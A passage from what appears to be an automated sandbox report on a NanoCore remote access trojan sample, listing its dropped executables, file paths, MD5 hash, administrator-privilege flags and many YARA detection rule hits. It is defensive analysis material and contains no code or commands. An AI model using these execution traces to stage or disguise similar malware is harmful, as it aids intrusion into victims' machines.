          • Rule: NanoCore, Description: unknown, Source: 00000005.00000002.930427801.0000000000330000.00000004.00001000.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          Antivirus matches:
          • Detection: 23%, ReversingLabs
          Reputation:low

          Target ID:7
          Start time:22:07:25
          Start date:16/05/2022
          Path:C:\Users\user\AppData\Local\Temp\jqenyeo.exe
          Wow64 process (32bit):true
          Commandline:C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk
          Imagebase:0x400000
          File size:75776 bytes
          MD5 hash:22A5EC1E72CE0D23B1598C40639BB3B2
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:.Net C# or VB.NET
          Yara matches:
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.1177072990.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000007.00000002.1177072990.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.1177072990.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
          • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000007.00000002.1177072990.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
          • Rule: NanoCore, Description: unknown, Source: 00000007.00000002.1177072990.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000000.925605410.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000000.925605410.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000007.00000000.925605410.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.1177611685.00000000032E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000007.00000002.1177611685.00000000032E9000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000000.924356311.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000000.924356311.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000007.00000000.924356311.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.1177965597.0000000004AE0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000007.00000002.1177965597.0000000004AE0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.1177965597.0000000004AE0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000007.00000002.1177965597.0000000004AE0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.1177133041.0000000000550000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000007.00000002.1177133041.0000000000550000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.1177133041.0000000000550000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000007.00000002.1177133041.0000000000550000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
          • Rule: NanoCore, Description: unknown, Source: 00000007.00000002.1177133041.0000000000550000.00000004.08000000.00040000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.1177349717.0000000002271000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.1177875614.00000000047B0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000007.00000002.1177875614.00000000047B0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
          • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000007.00000002.1177875614.00000000047B0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.1177195760.00000000005ED000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.1177195760.00000000005ED000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000007.00000002.1177195760.00000000005ED000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.1177296193.0000000001ED2000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.1177296193.0000000001ED2000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000007.00000002.1177296193.0000000001ED2000.00000040.00001000.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          Reputation:low

          Target ID:8
          Start time:22:07:35
          Start date:16/05/2022
          Path:C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe"
          Imagebase:0x400000
          File size:75776 bytes
          MD5 hash:22A5EC1E72CE0D23B1598C40639BB3B2
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Antivirus matches:
          • Detection: 23%, ReversingLabs
          Reputation:low

          No disassembly